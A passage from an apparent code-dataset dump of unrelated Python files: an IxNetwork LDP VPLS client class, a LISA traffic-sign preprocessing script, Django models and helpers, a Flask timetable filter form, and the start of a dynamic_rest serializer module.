Errors=None,\n        LocalRouterID=None,\n        Multiplier=None,\n        Name=None,\n        SessionStatus=None,\n        StackedLayers=None,\n        StateCounts=None,\n        Status=None,\n    ):\n        \"\"\"Finds and retrieves ldppwvpls resources from the server.\n\n        All named parameters are evaluated on the server using regex. The named parameters can be used to selectively retrieve ldppwvpls resources from the server.\n        To retrieve an exact match ensure the parameter value starts with ^ and ends with $\n        By default the find method takes no parameters and will retrieve all ldppwvpls resources from the server.\n\n        Args\n        ----\n        - AutoPeerId (bool): If selected, LDP Peer IP would be taken from LDP router's peer configuration.\n        - ConnectedVia (list(str[None | /api/v1/sessions/1/ixnetwork/topology])): List of layers this layer is used to connect with to the wire.\n        - Count (number): Number of elements inside associated multiplier-scaled container object, e.g. number of devices inside a Device Group.\n        - DescriptiveName (str): Longer, more descriptive name for element. It's not guaranteed to be unique like -name-, but may offer more context.\n        - Errors (list(dict(arg1:str[None | /api/v1/sessions/1/ixnetwork/],arg2:list[str]))): A list of errors that have occurred\n        - LocalRouterID (list(str)): Router ID\n        - Multiplier (number): Number of layer instances per parent instance (multiplier)\n        - Name (str): Name of NGPF element, guaranteed to be unique in Scenario\n        - SessionStatus (list(str[down | notStarted | up])): Current state of protocol session: Not Started - session negotiation not started, the session is not active yet. Down - actively trying to bring up a protocol session, but negotiation didn't successfully complete (yet). Up - session came up successfully.\n        - StackedLayers (list(str[None | /api/v1/sessions/1/ixnetwork/topology])): List of secondary (many to one) child layer protocols\n        - StateCounts (dict(total:number,notStarted:number,down:number,up:number)): A list of values that indicates the total number of sessions, the number of sessions not started, the number of sessions down and the number of sessions that are up\n        - Status (str(configured | error | mixed | notStarted | started | starting | stopping)): Running status of associated network element. 
Once in Started state, protocol sessions will begin to negotiate.\n\n Returns\n -------\n - self: This instance with matching ldppwvpls resources retrieved from the server available through an iterator or index\n\n Raises\n ------\n - ServerError: The server has encountered an uncategorized error condition\n \"\"\"\n return self._select(self._map_locals(self._SDM_ATT_MAP, locals()))\n\n def read(self, href):\n \"\"\"Retrieves a single instance of ldppwvpls data from the server.\n\n Args\n ----\n - href (str): An href to the instance to be retrieved\n\n Returns\n -------\n - self: This instance with the ldppwvpls resources from the server available through an iterator or index\n\n Raises\n ------\n - NotFoundError: The requested resource does not exist on the server\n - ServerError: The server has encountered an uncategorized error condition\n \"\"\"\n return self._read(href)\n\n def Abort(self, *args, **kwargs):\n # type: (*Any, **Any) -> None\n \"\"\"Executes the abort operation on the server.\n\n Abort CPF control plane (equals to demote to kUnconfigured state).\n\n The IxNetwork model allows for multiple method Signatures with the same name while python does not.\n\n abort(async_operation=bool)\n ---------------------------\n - async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.\n\n abort(SessionIndices=list, async_operation=bool)\n ------------------------------------------------\n - SessionIndices (list(number)): This parameter requires an array of session numbers 1 2 3\n - async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.\n\n abort(SessionIndices=string, async_operation=bool)\n --------------------------------------------------\n - SessionIndices (str): This parameter requires a string of session numbers 1-4;6;7-12\n - async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.\n\n Raises\n ------\n - NotFoundError: The requested resource does not exist on the server\n - ServerError: The server has encountered an uncategorized error condition\n \"\"\"\n payload = {\"Arg1\": self}\n for i in range(len(args)):\n payload[\"Arg%s\" % (i + 2)] = args[i]\n for item in kwargs.items():\n payload[item[0]] = item[1]\n return self._execute(\"abort\", payload=payload, response_object=None)\n\n def PurgeVCRanges(self, *args, **kwargs):\n # type: (*Any, **Any) -> None\n \"\"\"Executes the purgeVCRanges operation on the server.\n\n Purge VC Ranges\n\n The IxNetwork model allows for multiple method Signatures with the same name while python does not.\n\n purgeVCRanges(async_operation=bool)\n -----------------------------------\n - async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.\n\n purgeVCRanges(SessionIndices=list, async_operation=bool)\n --------------------------------------------------------\n - SessionIndices (list(number)): This parameter requires an array of session numbers 1 2 3\n - async_operation (bool=False): True to execute the operation asynchronously. 
Any subsequent rest api calls made through the Connection class will block until the operation is complete.\n\n purgeVCRanges(SessionIndices=string, async_operation=bool)\n ----------------------------------------------------------\n - SessionIndices (str): This parameter requires a string of session numbers 1-4;6;7-12\n - async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.\n\n Raises\n ------\n - NotFoundError: The requested resource does not exist on the server\n - ServerError: The server has encountered an uncategorized error condition\n \"\"\"\n payload = {\"Arg1\": self}\n for i in range(len(args)):\n payload[\"Arg%s\" % (i + 2)] = args[i]\n for item in kwargs.items():\n payload[item[0]] = item[1]\n return self._execute(\"purgeVCRanges\", payload=payload, response_object=None)\n\n def Purgevcranges(self, *args, **kwargs):\n # type: (*Any, **Any) -> Union[List[str], None]\n \"\"\"Executes the purgevcranges operation on the server.\n\n Purge Ethernet VC. Sends Address Withdraw message to purge all MACs learnt for this VC. Applicable for Ethernet Type VC only ( not VLAN).\n\n purgevcranges(Arg2=list, async_operation=bool)list\n --------------------------------------------------\n - Arg2 (list(number)): Purge VC Ranges.\n - async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.\n - Returns list(str): ID to associate each async action invocation\n\n Raises\n ------\n - NotFoundError: The requested resource does not exist on the server\n - ServerError: The server has encountered an uncategorized error condition\n \"\"\"\n payload = {\"Arg1\": self.href}\n for i in range(len(args)):\n payload[\"Arg%s\" % (i + 2)] = args[i]\n for item in kwargs.items():\n payload[item[0]] = item[1]\n return self._execute(\"purgevcranges\", payload=payload, response_object=None)\n\n def PurgeVPLSMac(self, *args, **kwargs):\n # type: (*Any, **Any) -> Union[List[str], None]\n \"\"\"Executes the purgeVPLSMac operation on the server.\n\n Purge VPLS MAC\n\n The IxNetwork model allows for multiple method Signatures with the same name while python does not.\n\n purgeVPLSMac(Mac_count=number, Mac=string, async_operation=bool)\n ----------------------------------------------------------------\n - Mac_count (number): This parameter requires a mac_count of type kInteger\n - Mac (str): This parameter requires a mac of type kString\n - async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.\n\n purgeVPLSMac(Mac_count=number, Mac=string, SessionIndices=list, async_operation=bool)\n -------------------------------------------------------------------------------------\n - Mac_count (number): This parameter requires a mac_count of type kInteger\n - Mac (str): This parameter requires a mac of type kString\n - SessionIndices (list(number)): This parameter requires an array of session numbers 1 2 3\n - async_operation (bool=False): True to execute the operation asynchronously. 
Any subsequent rest api calls made through the Connection class will block until the operation is complete.\n\n        purgeVPLSMac(SessionIndices=string, Mac_count=number, Mac=string, async_operation=bool)\n        ---------------------------------------------------------------------------------------\n        - SessionIndices (str): This parameter requires a string of session numbers 1-4;6;7-12\n        - Mac_count (number): This parameter requires a mac_count of type kInteger\n        - Mac (str): This parameter requires a mac of type kString\n        - async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.\n\n        purgeVPLSMac(Arg2=list, Arg3=number, Arg4=string, async_operation=bool)list\n        ---------------------------------------------------------------------------\n        - Arg2 (list(number)): Purge Ethernet MAC.\n        - Arg3 (number): Number of Mac addresses to purge\n        - Arg4 (str): Mac addresses start\n        - async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.\n        - Returns list(str): ID to associate each async action invocation\n\n        Raises\n        ------\n        - NotFoundError: The requested resource does not exist on the server\n        - ServerError: The server has encountered an uncategorized error condition\n        \"\"\"\n        payload = {\"Arg1\": self}\n        for i in range(len(args)):\n            payload[\"Arg%s\" % (i + 2)] = args[i]\n        for item in kwargs.items():\n            payload[item[0]] = item[1]\n        return self._execute(\"purgeVPLSMac\", payload=payload, response_object=None)\n\n    def RestartDown(self, *args, **kwargs):\n        # type: (*Any, **Any) -> None\n        \"\"\"Executes the restartDown operation on the server.\n\n        Stop and start interfaces and sessions that are in Down state.\n\n        The IxNetwork model allows for multiple method Signatures with the same name while python does not.\n\n        restartDown(async_operation=bool)\n        ---------------------------------\n        - async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.\n\n        restartDown(SessionIndices=list, async_operation=bool)\n        ------------------------------------------------------\n        - SessionIndices (list(number)): This parameter requires an array of session numbers 1 2 3\n        - async_operation (bool=False): True to execute the operation asynchronously. 
Any subsequent rest api calls made through the Connection class will block until the operation is complete.\n\n Raises\n ------\n - NotFoundError: The requested resource does not exist on the server\n - ServerError: The server has encountered an uncategorized error condition\n \"\"\"\n payload = {\"Arg1\": self}\n for i in range(len(args)):\n payload[\"Arg%s\" % (i + 2)] = args[i]\n for item in kwargs.items():\n payload[item[0]] = item[1]\n return self._execute(\"restartDown\", payload=payload, response_object=None)\n\n def Start(self, *args, **kwargs):\n # type: (*Any, **Any) -> None\n \"\"\"Executes the start operation on the server.\n\n Start CPF control plane (equals to promote to negotiated state).\n\n The IxNetwork model allows for multiple method Signatures with the same name while python does not.\n\n start(async_operation=bool)\n ---------------------------\n - async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.\n\n start(SessionIndices=list, async_operation=bool)\n ------------------------------------------------\n - SessionIndices (list(number)): This parameter requires an array of session numbers 1 2 3\n - async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.\n\n start(SessionIndices=string, async_operation=bool)\n --------------------------------------------------\n - SessionIndices (str): This parameter requires a string of session numbers 1-4;6;7-12\n - async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.\n\n Raises\n ------\n - NotFoundError: The requested resource does not exist on the server\n - ServerError: The server has encountered an uncategorized error condition\n \"\"\"\n payload = {\"Arg1\": self}\n for i in range(len(args)):\n payload[\"Arg%s\" % (i + 2)] = args[i]\n for item in kwargs.items():\n payload[item[0]] = item[1]\n return self._execute(\"start\", payload=payload, response_object=None)\n\n def Stop(self, *args, **kwargs):\n # type: (*Any, **Any) -> None\n \"\"\"Executes the stop operation on the server.\n\n Stop CPF control plane (equals to demote to PreValidated-DoDDone state).\n\n The IxNetwork model allows for multiple method Signatures with the same name while python does not.\n\n stop(async_operation=bool)\n --------------------------\n - async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.\n\n stop(SessionIndices=list, async_operation=bool)\n -----------------------------------------------\n - SessionIndices (list(number)): This parameter requires an array of session numbers 1 2 3\n - async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.\n\n stop(SessionIndices=string, async_operation=bool)\n -------------------------------------------------\n - SessionIndices (str): This parameter requires a string of session numbers 1-4;6;7-12\n - async_operation (bool=False): True to execute the operation asynchronously. 
Any subsequent rest api calls made through the Connection class will block until the operation is complete.\n\n Raises\n ------\n - NotFoundError: The requested resource does not exist on the server\n - ServerError: The server has encountered an uncategorized error condition\n \"\"\"\n payload = {\"Arg1\": self}\n for i in range(len(args)):\n payload[\"Arg%s\" % (i + 2)] = args[i]\n for item in kwargs.items():\n payload[item[0]] = item[1]\n return self._execute(\"stop\", payload=payload, response_object=None)\n\n def get_device_ids(\n self,\n PortNames=None,\n Active=None,\n AutoPeerID=None,\n BfdPwCV=None,\n BfdUdpCV=None,\n CBitEnabled=None,\n DescEnabled=None,\n Description=None,\n DownInterval=None,\n DownStart=None,\n EnableCCCVNegotiation=None,\n EnablePWStatus=None,\n GroupId=None,\n InterfaceType=None,\n Ipv6PeerId=None,\n LSPPingCV=None,\n Label=None,\n Mtu=None,\n PWACHCC=None,\n PWStatusCode=None,\n PeerId=None,\n PwStatusSendNotification=None,\n RepeatCount=None,\n RouterAlertCC=None,\n UpInterval=None,\n VCIDStart=None,\n ):\n \"\"\"Base class infrastructure that gets a list of ldppwvpls device ids encapsulated by this object.\n\n Use the optional regex parameters in the method to refine the list of device ids encapsulated by this object.\n\n Args\n ----\n - PortNames (str): optional regex of port names\n - Active (str): optional regex of active\n - AutoPeerID (str): optional regex of autoPeerID\n - BfdPwCV (str): optional regex of bfdPwCV\n - BfdUdpCV (str): optional regex of bfdUdpCV\n - CBitEnabled (str): optional regex of cBitEnabled\n - DescEnabled (str): optional regex of descEnabled\n - Description (str): optional regex of description\n - DownInterval (str): optional regex of downInterval\n - DownStart (str): optional regex of downStart\n - EnableCCCVNegotiation (str): optional regex of enableCCCVNegotiation\n - EnablePWStatus (str): optional regex of enablePWStatus\n - GroupId (str): optional regex of groupId\n - InterfaceType (str): optional regex of interfaceType\n - Ipv6PeerId (str): optional regex of ipv6PeerId\n - LSPPingCV (str): optional regex of lSPPingCV\n - Label (str): optional regex of label\n - Mtu (str): optional regex of mtu\n - PWACHCC (str): optional regex of pWACHCC\n - PWStatusCode (str): optional regex of pWStatusCode\n - PeerId (str): optional regex of peerId\n - PwStatusSendNotification (str): optional regex of pwStatusSendNotification\n - RepeatCount (str): optional regex of repeatCount\n - RouterAlertCC (str): optional regex of routerAlertCC\n - UpInterval (str): optional regex of upInterval\n - VCIDStart (str): optional regex of vCIDStart\n\n Returns\n -------\n - list(int): A list of device ids that meets the regex criteria provided in the method parameters\n\n Raises\n ------\n - ServerError: The server has encountered an uncategorized error condition\n \"\"\"\n return self._get_ngpf_device_ids(locals())\n","sub_path":"ixnetwork_restpy/testplatform/sessions/ixnetwork/topology/ldppwvpls_e691d6b250f877cef17952ec6e6b30b9.py","file_name":"ldppwvpls_e691d6b250f877cef17952ec6e6b30b9.py","file_ext":"py","file_size_in_byte":48612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"433706280","text":"import os, sys, csv\nfrom PIL import Image\n\ncurrdir = os.path.abspath(os.path.join(os.path.abspath(__file__), os.pardir))\npardir = os.path.abspath(os.path.join(currdir, os.pardir))\nbasedir = 'D:\\Yanxi\\MMGRAD\\MM803\\Project\\signDatabasePublicFramesOnly' # change this\ntoolsdir = basedir + 
'/tools/'\nsys.path.append(toolsdir)\nsys.argv.append('80') # 80% training data - 20% testing\nsys.argv.append(basedir + '/allAnnotations.csv')\nimport splitAnnotationFiles\n\nsign_labels = {}\n\nwith open(pardir+'/Sign_labels.csv', 'rt') as csvfile:\n\treader = csv.reader(csvfile, delimiter=',')\n\tfor i, row in enumerate(reader):\n\t\tif i == 0:\n\t\t\tcontinue\n\t\tif row[2] != 'None':\n\t\t\tsign_labels[row[2]] = row[0]\n\n\ndef parse_csv(csv_file):\n\tfilenames, annotations = [], []\n\twith open(csv_file, 'rt') as csvfile:\n\t\treader = csv.reader(csvfile, delimiter=' ')\n\t\tfor i, row in enumerate(reader):\n\t\t\tif i == 0:\n\t\t\t\tcontinue\n\t\t\tdata = row[0].split(',')[0].split(';')\n\t\t\ttag = data[1]\n\t\t\tif tag not in sign_labels:\n\t\t\t\tcontinue\n\t\t\tfilenames.append(data[0])\n\t\t\tupper_left_x, upper_left_y, lower_right_x, lower_right_y = int(data[2]), int(data[3]), int(data[4]), int(data[5])\n\t\t\tx, y, width, height = (upper_left_x + lower_right_x) // 2, (upper_left_y + lower_right_y) // 2, \\\n\t\t\t\t\t\t\t\t\tlower_right_x - upper_left_x, lower_right_y - upper_left_y\n\t\t\tannotations.append([sign_labels[tag], x, y, width, height])\n\treturn filenames, annotations\n\n\ndef convert(filenames, annotations, type):\n\tif not os.path.exists(basedir+'/'+type):\n\t\tos.makedirs(basedir+'/'+type)\n\tfor i, name in enumerate(filenames):\n\t\tim = Image.open(basedir+'/'+name)\n\t\tim_width, im_height = im.size\n\t\trgb_im = im.convert('RGB')\n\t\trgb_im.save(basedir+'/'+type+'/'+type+str(i)+'.jpg')\n\n\t\tcls_num, abs_x, abs_y, abs_width, abs_height = annotations[i]\n\n\t\twith open(basedir+'/'+type+'/'+type+str(i)+\".txt\", \"w\") as text_file:\n\t\t\ttext_file.write(\"%s %s %s %s %s\" % (cls_num, abs_x/im_width, abs_y/im_height, abs_width/im_width, abs_height/im_height))\n\n\t\tprint('Generating '+type+str(i))\n\n\n#train_img, train_annot = parse_csv(basedir+'\\split1.csv')\n#convert(train_img, train_annot, 'Train')\n#test_img, test_annot = parse_csv(basedir+'\\split2.csv')\n#convert(test_img, test_annot, 'Test')\n\n# --------------------------Extract for CNN-------------------------------\n\nimport numpy as np\nimport pickle\n\n\ndef pickle_im(annotation, size, data_type):\n\tsys.path.append(toolsdir)\n\tsys.argv.append('crop')\n\tsys.argv.append(annotation)\n\t#import extractAnnotations\n\n\timages = os.listdir(basedir+'/annotations/')\n\tX, y = [], []\n\tfor path in images:\n\t\tim = Image.open(basedir+'/annotations/'+path)\n\t\tout = im.resize((size, size))\n\t\ttag = path.split('_')[1]\n\t\tif tag not in sign_labels:\n\t\t\tcontinue\n\t\tX.append(np.asarray(out))\n\t\ty.append(np.asarray(sign_labels[tag]))\n\n\twith open(basedir+'/X_'+data_type+'.p', 'wb') as f:\n\t\tpickle.dump(np.array(X), f)\n\n\twith open(basedir+'/y_'+data_type+'.p', 'wb') as f:\n\t\tpickle.dump(np.array(y), f)\n\n\tprint(images)\n\n#pickle_im(basedir+'/split1.csv', 32, 'train')\n#pickle_im(basedir+'/split2.csv', 32, 'test')\n\n\n# -----------------------Extract new dataset for CNN----------------------------\ntraindir = 'D:\\Yanxi\\MMGRAD\\MM803\\Project/train/'\ntestdir = 'D:\\Yanxi\\MMGRAD\\MM803\\Project/test/'\nbasedir = 'D:\\Yanxi\\MMGRAD\\MM803\\Project/'\n\n\ndef append_pickle(imdir, pkldir, data_type):\n\tnew_X, new_y = [], []\n\tsubdir = os.listdir(imdir+data_type+'/')\n\tfor sub in subdir:\n\t\ts = imdir+data_type+'/'+sub+'/'\n\t\tfor im in os.listdir(s):\n\t\t\timage = Image.open(s+im)\n\t\t\tout = image.resize((32, 
32))\n\t\t\tnew_X.append(np.asarray(out))\n\t\t\tnew_y.append(np.asarray(sub))\n\n\twith open(pkldir+'X_'+data_type+'.p', 'rb') as f:\n\t\tX = pickle.load(f)\n\twith open(pkldir+'y_'+data_type+'.p', 'rb') as f:\n\t\ty = pickle.load(f)\n\n\tX_total = np.concatenate((X, np.asarray(new_X)), axis=0)\n\ty_total = np.concatenate((y, np.asarray(new_y)), axis=0)\n\n\twith open(pkldir+'X_'+data_type+'.p', 'wb') as f:\n\t\tpickle.dump(X_total, f)\n\twith open(pkldir+'y_'+data_type+'.p', 'wb') as f:\n\t\tpickle.dump(y_total, f)\n","sub_path":"TSR/preprocessing/ConvertLISA.py","file_name":"ConvertLISA.py","file_ext":"py","file_size_in_byte":4017,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"652456627","text":"from autoslug import AutoSlugField\nfrom django.contrib.auth.models import User, Group, Permission\nfrom django.core.exceptions import ValidationError\nfrom django.db import models\nfrom django.utils.datetime_safe import datetime\nfrom account.models import Eestecer\nfrom eestecnet import settings\nfrom events.models import Event\n\nTYPE_CHOICES = (\n ('body', 'Body'),\n ('team', 'International Team'),\n ('lc', 'Local Committee'),\n ('jlc', 'Junior Local Committee'),\n ('observer', 'Observer'),\n )\nclass Member(models.Model):\n \"\"\"Member objects are used to unify and abstract away from the internal entity of parts of our organization.\n\n Members can be Observers, LCs, Junior LCs, International Teams or Bodies of the association.\n The goal using these objects is to unify the way how we handle interactions that are common to all five kinds of parts of eestec\n\n When Members are created first, a local event called Recruitment is automatically created. By applying to\n event, registered users can become part of one or more members.\"\"\"\n\n #General\n \"\"\" The name of the :class:`Member`\"\"\"\n name = models.CharField(max_length=50,unique=True)\n slug=AutoSlugField(populate_from='name')\n \"\"\"The type of the :class:`Member`\"\"\"\n type = models.CharField(\n max_length=30,\n choices=TYPE_CHOICES,\n default='lc')\n thumbnail=models.ImageField(blank=True,null=True,upload_to=\"memberthumbs\")\n thumbsource=models.CharField(max_length=50,blank=True,null=True)\n \"\"\"The picture that should appear in the :class:`Member` list\"\"\"\n description= models.TextField(blank= True, null=True)\n \"\"\" LC info text\"\"\"\n facebook = models.URLField(blank=True, null=True)\n \"\"\" Facebook page for the member\"\"\"\n website = models.URLField(blank=True, null=True)\n address = models.TextField(blank=True, null=True)\n def clean(self):\n # Don't allow draft entries to have a pub_date.\n if self.thumbnail and not self.thumbsource:\n raise ValidationError('Please provide the source for the image')\n\n #Members\n members = models.ManyToManyField(\n Eestecer,\n blank=True,\n null=True,\n related_name='members')\n \"\"\" The :class:`Users <account.models.Eestecer>` who are considered\n to be part of the :class:`Member`\"\"\"\n priviledged = models.ManyToManyField(\n Eestecer,\n blank=True,\n null=True,\n related_name='priviledged')\n \"\"\"The priviledged :class:`Users <account.models.Eestecer>` of the :class:`Member`,\n they are able to make changes.\"\"\"\n board = models.ManyToManyField(\n Eestecer,\n blank=True,\n null=True,\n related_name='board')\n \"\"\"The board of the :class:`Member`\"\"\"\n founded=models.PositiveIntegerField(null=True, blank=True)\n \"\"\"When the :class:`Member` was first established\"\"\"\n def save(self, 
*args, **kwargs):\n        if self.pk is None:\n            super(Member, self).save(*args, **kwargs)\n            a = Event.objects.create(\n                name=str(self.slug+\" recruitment\"),\n                scope=\"local\",\n                category=\"recruitment\",\n                summary=\"Interested in joining? Apply here or click for more information\",\n                description=\"We are always recruiting and welcoming new people.\",\n                start_date=datetime.now()\n            )\n            a.save()\n            a.organizing_committee = [self]\n        else:\n            for usr in self.priviledged.all():\n                usr.is_staff = True\n                usr.groups.add(Group.objects.get(name='Local Admins'))\n                usr.save()\n        super(Member, self).save(*args, **kwargs)\n    def __unicode__(self):\n        if self.type not in ['jlc', 'lc', 'observer']:\n            return self.name\n        return self.type.upper() + \" \" + self.name\n    def member_count(self):\n        \"\"\" The amount of members currently in the :class:`Member` \"\"\"\n        return len(self.members.all()) - 1\n    def last_event(self):\n        \"\"\" The date of the last :class:`~events.models.Event` organized by the :class:`Member` \"\"\"\n        try:\n            return self.event_set.all().exclude(name='Recruitment').order_by('-start_date')[0].start_date\n        except IndexError:\n            return 0\nclass MemberImage(models.Model):\n    \"\"\" Helper class used to associate an arbitrary number of images with a :class:`Member` \"\"\"\n\n    property = models.ForeignKey(Member, related_name='images')\n    image = models.ImageField(upload_to=\"memberimages\")\n    \"\"\"An Image\"\"\"","sub_path":"members/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"590839638","text":"from flask import session, flash\nfrom flask import g\nfrom flask_wtf import FlaskForm\nfrom wtforms import PasswordField, StringField, SubmitField, BooleanField, SelectField, FieldList\nfrom wtforms.validators import DataRequired\n\nfrom data import db_session\nfrom data.cl_const import Const\nfrom data.db_class_courses import Courses\nfrom data.db_class_days import Days\nfrom data.db_class_groups import Groups\nfrom data.db_class_kabs import Kabs\nfrom data.db_class_priv import Priv\nfrom data.db_class_roles import Roles\nfrom data.db_class_users import Users\n\n\nclass RaspFilterForm(FlaskForm):\n    fr_course = SelectField('Course', coerce=int)\n    fr_group = SelectField('Study group', coerce=int)\n    fr_users = SelectField('Mentor full name', coerce=int)\n    fr_weekday = SelectField('Day of week', coerce=int)\n    fr_kabinet = SelectField('Room', coerce=int)\n    submit = SubmitField('Apply filter')\n\n    def __init__(self, *args, **kwargs):\n        super(RaspFilterForm, self).__init__(*args, **kwargs)\n        # try:\n        #     with db_session.create_session() as db_sess:\n        #         # Users\n        #         try:\n        users = g.db_sess.query(Users).join(Roles).join(Priv).join(Groups, Groups.idUsers == Users.id).\\\n            join(Courses, Courses.id == Groups.idCourses).\\\n            filter(Priv.access.like(Const.ACC_PREPOD)).order_by(Users.name)\n        if self.fr_course.data:\n            users = users.filter(Courses.id == self.fr_course.data)\n        if self.fr_group.data:\n            users = users.filter(Groups.id == self.fr_group.data)\n        #         except Exception as err:\n        #             users = None\n        #             flash(\"SQL processing error\", category='error')\n        self.fr_users.choices = [(row.id, f'{row.name}') for row in users]\n        self.fr_users.choices.insert(0, (0, \"Not selected\"))\n        if self.fr_users.data is not None:\n            self.fr_users.default = self.fr_users.data\n        else:\n            self.fr_users.data = session.get('fr_users', 0)\n        # Day of week\n        try:\n            week_day = g.db_sess.query(Days).order_by(Days.id)\n        except Exception 
        # Day of the week\n        try:\n            week_day = g.db_sess.query(Days).order_by(Days.id)\n        except Exception:\n            # use an empty list, not None, so the comprehension below cannot crash\n            week_day = []\n            flash(f\"Ошибка обработки SQL\", category='error')\n        self.fr_weekday.choices = [(gg.id, gg.name) for gg in week_day]\n        self.fr_weekday.choices.insert(0, (0, u\"Не выбран\"))\n        if self.fr_weekday.data is not None:\n            self.fr_weekday.default = self.fr_weekday.data\n        else:\n            self.fr_weekday.data = session.get('fr_weekday', 0)\n        # Room\n        try:\n            kabs = g.db_sess.query(Kabs).order_by(Kabs.id)\n        except Exception:\n            kabs = []\n            flash(f\"Ошибка обработки SQL\", category='error')\n        self.fr_kabinet.choices = [(gg.id, gg.name) for gg in kabs]\n        self.fr_kabinet.choices.insert(0, (0, u\"Не выбран\"))\n        if self.fr_kabinet.data is not None:\n            self.fr_kabinet.default = self.fr_kabinet.data\n        else:\n            self.fr_kabinet.data = session.get('fr_kabinet', 0)\n        # Course\n        try:\n            courses = g.db_sess.query(Courses).join(Groups, Groups.idCourses == Courses.id).\\\n                order_by(Courses.name).filter(Courses.year == Const.YEAR)\n            if self.fr_users.data:\n                courses = courses.filter(Groups.idUsers == self.fr_users.data)\n            if self.fr_group.data:\n                courses = courses.filter(Groups.id == self.fr_group.data)\n        except Exception:\n            courses = []\n            flash(f\"Ошибка обработки SQL\", category='error')\n        self.fr_course.choices = [(crs.id, crs.name[:40]) for crs in courses]\n        self.fr_course.choices.insert(0, (0, u\"Не выбран\"))\n        if self.fr_course.data is not None:\n            self.fr_course.default = self.fr_course.data\n        else:\n            self.fr_course.data = session.get('fr_course', 0)\n        # Study group\n        try:\n            groups = g.db_sess.query(Groups).join(Courses).order_by(Groups.name).\\\n                filter(Courses.year == Const.YEAR)\n            if self.fr_course.data:\n                groups = groups.filter(Courses.id == self.fr_course.data)\n            if self.fr_users.data:\n                groups = groups.filter(Groups.idUsers == self.fr_users.data)\n        except Exception:\n            groups = []\n            flash(f\"Ошибка обработки SQL\", category='error')\n        self.fr_group.choices = [(gg.id, f'{gg.name} {gg.comment}') for gg in groups]\n        self.fr_group.choices.insert(0, (0, u\"Не выбрана\"))\n        if self.fr_group.data is not None:\n            self.fr_group.default = self.fr_group.data\n        else:\n            self.fr_group.data = session.get('fr_group', 0)\n","sub_path":"forms/f_rasp.py","file_name":"f_rasp.py","file_ext":"py","file_size_in_byte":5179,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"310051402","text":"import warnings\n\nfrom django.contrib.auth.decorators import login_required\n\nimport requests\n\ndef get(*args, **kwargs):\n    r = requests.get(*args, **kwargs)\n    if not r.ok:\n        warnings.warn('Error %d on request for %s' % (r.status_code, r.url))\n    return r\n\nclass LoginRequiredMixin:\n    'https://docs.djangoproject.com/en/dev/topics/class-based-views/intro/#mixins-that-wrap-as-view'\n    @classmethod\n    def as_view(cls, **initkwargs):\n        view = super(LoginRequiredMixin, cls).as_view(**initkwargs)\n        return login_required(view)\n","sub_path":"notes/django-version/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"546059076","text":"\"\"\"This module contains custom serializer classes.\"\"\"\nimport copy\nimport inspect\n\nfrom collections import OrderedDict\nimport inflection\nfrom django.db import models, transaction\nfrom django.utils import six\nfrom 
django.db.models.fields.files import FieldFile\nfrom django.utils.functional import cached_property\nfrom rest_framework import exceptions, fields, serializers\nfrom rest_framework.fields import SkipField, JSONField\nfrom rest_framework.reverse import reverse\nfrom rest_framework.exceptions import ValidationError\nfrom rest_framework.utils.serializer_helpers import ReturnDict, ReturnList\n\nfrom dynamic_rest.filters import Filter\nfrom dynamic_rest.permissions import PermissionsSerializerMixin\nfrom dynamic_rest.conf import settings\nfrom dynamic_rest.fields import DynamicRelationField\nfrom dynamic_rest.links import merge_link_object\nfrom dynamic_rest.bound import DynamicJSONBoundField, DynamicBoundField\nfrom dynamic_rest.meta import (\n    Meta,\n    get_model_table,\n    get_model_field,\n    get_related_model\n)\nfrom dynamic_rest.processors import SideloadingProcessor\nfrom dynamic_rest.tagged import tag_dict\nfrom dynamic_rest.base import DynamicBase\n\n\ndef nested_update(instance, key, value, objects=None):\n    objects = objects or []\n    nested = getattr(instance, key, None)\n\n    def fix(x):\n        s = str(x).lower()\n        if s == \"true\":\n            return \"True\"\n        if s == \"false\":\n            return \"False\"\n        return x\n\n    value = {\n        k: fix(v) for k, v in value.items()\n    }\n    if not nested:\n        # object does not exist, try to create it\n        try:\n            field = get_model_field(instance, key)\n            related_model = get_related_model(field)\n        except Exception:\n            raise exceptions.ValidationError(\n                'Invalid relationship: %s' % key\n            )\n        else:\n            nested = related_model.objects.create(**value)\n            setattr(instance, key, nested)\n    else:\n        # object exists, perform a nested update\n        for k, v in six.iteritems(value):\n            if isinstance(v, dict):\n                nested_update(nested, k, v, objects)\n            else:\n                setattr(nested, k, v)\n        objects.append(nested)\n    return objects\n\n\nclass WithResourceKeyMixin(object):\n    @classmethod\n    def get_resource_key(cls):\n        \"\"\"Return canonical resource key, usually the DB table name.\"\"\"\n        model = cls.get_model()\n        if model:\n            return get_model_table(model)\n        else:\n            return cls.get_name()\n\n\nclass 